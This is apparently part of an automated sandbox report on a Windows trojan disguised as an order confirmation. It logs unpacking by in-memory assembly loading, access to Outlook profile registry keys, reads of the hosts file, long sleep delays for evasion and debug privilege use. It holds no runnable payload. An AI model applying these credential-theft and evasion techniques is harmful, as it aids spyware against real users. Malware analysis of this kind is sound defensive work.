                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0657196812_2_06571968
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_065749E012_2_065749E0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_065756DA12_2_065756DA
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_065726CE12_2_065726CE
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_065797B812_2_065797B8
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0657A45A12_2_0657A45A
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_065784D012_2_065784D0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0657457A12_2_0657457A
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0657528012_2_06575280
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_065733F012_2_065733F0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_065763E012_2_065763E0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0657000612_2_06570006
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_065740F812_2_065740F8
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0657916812_2_06579168
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_065771E712_2_065771E7
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_06579E0812_2_06579E08
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_06574E2812_2_06574E28
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_06577E8812_2_06577E88
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_06575F9112_2_06575F91
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_06572F9A12_2_06572F9A
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_06570C5812_2_06570C58
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_06573CA012_2_06573CA0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0657AAA012_2_0657AAA0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_06572B4012_2_06572B40
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_06575B3012_2_06575B30
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0657783A12_2_0657783A
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_065708F012_2_065708F0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_065708E012_2_065708E0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0657195812_2_06571958
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_065749CF12_2_065749CF
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.342475474.00000000027C8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs order confirmation 46574 -QT-04-0022.exe
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000003.335961357.0000000003B79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePzkmuussffxq.dll" vs order confirmation 46574 -QT-04-0022.exe
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.343064408.00000000037F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameiJMJnUDAnLMGBkvrphkwZ.exeL vs order confirmation 46574 -QT-04-0022.exe
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.343064408.00000000037F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePzkmuussffxq.dll" vs order confirmation 46574 -QT-04-0022.exe
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.342692541.000000000291D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameiJMJnUDAnLMGBkvrphkwZ.exeL vs order confirmation 46574 -QT-04-0022.exe
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.342975236.0000000003791000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameiJMJnUDAnLMGBkvrphkwZ.exeL vs order confirmation 46574 -QT-04-0022.exe
                Source: order confirmation 46574 -QT-04-0022.exe, 0000000C.00000000.340588918.0000000000422000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameiJMJnUDAnLMGBkvrphkwZ.exeL vs order confirmation 46574 -QT-04-0022.exe
                Source: order confirmation 46574 -QT-04-0022.exe, 0000000C.00000002.527871002.0000000000B97000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs order confirmation 46574 -QT-04-0022.exe
                Source: order confirmation 46574 -QT-04-0022.exeVirustotal: Detection: 24%
                Source: order confirmation 46574 -QT-04-0022.exeReversingLabs: Detection: 61%
                Source: order confirmation 46574 -QT-04-0022.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exe "C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exe"
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess created: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exe C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exe
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess created: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exe C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\order confirmation 46574 -QT-04-0022.exe.logJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.12.unpack, A?u05c9t?/uf0b9????.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.12.unpack, ufffd?ufffdu002d?/??O?ufffd.csCryptographic APIs: 'TransformFinalBlock'
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.8.unpack, A?u05c9t?/uf0b9????.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.8.unpack, ufffd?ufffdu002d?/??O?ufffd.csCryptographic APIs: 'TransformFinalBlock'
                Source: 12.2.order confirmation 46574 -QT-04-0022.exe.400000.0.unpack, A?u05c9t?/uf0b9????.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: 12.2.order confirmation 46574 -QT-04-0022.exe.400000.0.unpack, ufffd?ufffdu002d?/??O?ufffd.csCryptographic APIs: 'TransformFinalBlock'
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.6.unpack, A?u05c9t?/uf0b9????.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: order confirmation 46574 -QT-04-0022.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: order confirmation 46574 -QT-04-0022.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: order confirmation 46574 -QT-04-0022.exe, u0003.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 0.2.order confirmation 46574 -QT-04-0022.exe.460000.0.unpack, u0003.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 0.0.order confirmation 46574 -QT-04-0022.exe.460000.0.unpack, u0003.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.a00000.7.unpack, u0003.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.a00000.2.unpack, u0003.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.a00000.3.unpack, u0003.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.a00000.11.unpack, u0003.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 12.2.order confirmation 46574 -QT-04-0022.exe.a00000.1.unpack, u0003.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.a00000.9.unpack, u0003.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.a00000.0.unpack, u0003.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.a00000.1.unpack, u0003.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.a00000.5.unpack, u0003.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.a00000.13.unpack, u0003.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 0_2_0253420B push esp; ret 0_2_02534212
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 0_2_025342C3 push esi; ret 0_2_025342C6
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 0_2_025342C7 push esi; ret 0_2_025342CA
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 0_2_02534113 push ecx; ret 0_2_02534116
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 0_2_02534111 push ecx; ret 0_2_02534112
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 0_2_02534117 push ecx; ret 0_2_0253411A
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 0_2_025341D1 push esp; ret 0_2_025341D2
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 0_2_02534481 push edi; ret 0_2_02534482
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 0_2_02534547 push edi; ret 0_2_0253454A
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 0_2_0253454B push edi; ret 0_2_02534552
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 0_2_02534501 push edi; ret 0_2_02534502
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 0_2_0253B201 pushfd ; ret 0_2_0253B202
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 0_2_0253B2B3 pushfd ; ret 0_2_0253B2B6
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 0_2_0253B2B1 pushfd ; ret 0_2_0253B2B2
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 0_2_0253B2B7 pushfd ; ret 0_2_0253B2BA
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 0_2_02535B58 push esp; ret 0_2_02535B59
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_06547EE5 push es; iretd 12_2_06547EE8
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_06545341 push es; retf 12_2_0654534C
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0657C472 push es; iretd 12_2_0657C474
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0657C426 push es; iretd 12_2_0657C428
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0657C491 push es; retf 12_2_0657C498
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0657C499 push es; retf 12_2_0657C4A0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0657C48E push es; retf 12_2_0657C490
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0657C4BE push es; iretd 12_2_0657C4C0
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0657C325 push es; retf 12_2_0657C370
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0657C38E push es; iretd 12_2_0657C390
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_0657C3BD push es; retf 12_2_0657C408
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exe TID: 6956Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exe TID: 6844Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeWindow / User API: threadDelayed 1054Jump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: order confirmation 46574 -QT-04-0022.exe, 00000000.00000002.343064408.00000000037F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: HFSOPlZcHdgffitVmcI
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeCode function: 12_2_014EC1D7 LdrInitializeThunk,12_2_014EC1D7
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                .NET source code references suspicious native API functions
                Source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.12.unpack, ufffd?ufffdu002d?/??O?ufffd.csReference to suspicious API methods: ('?????', 'MapVirtualKey@user32.dll')
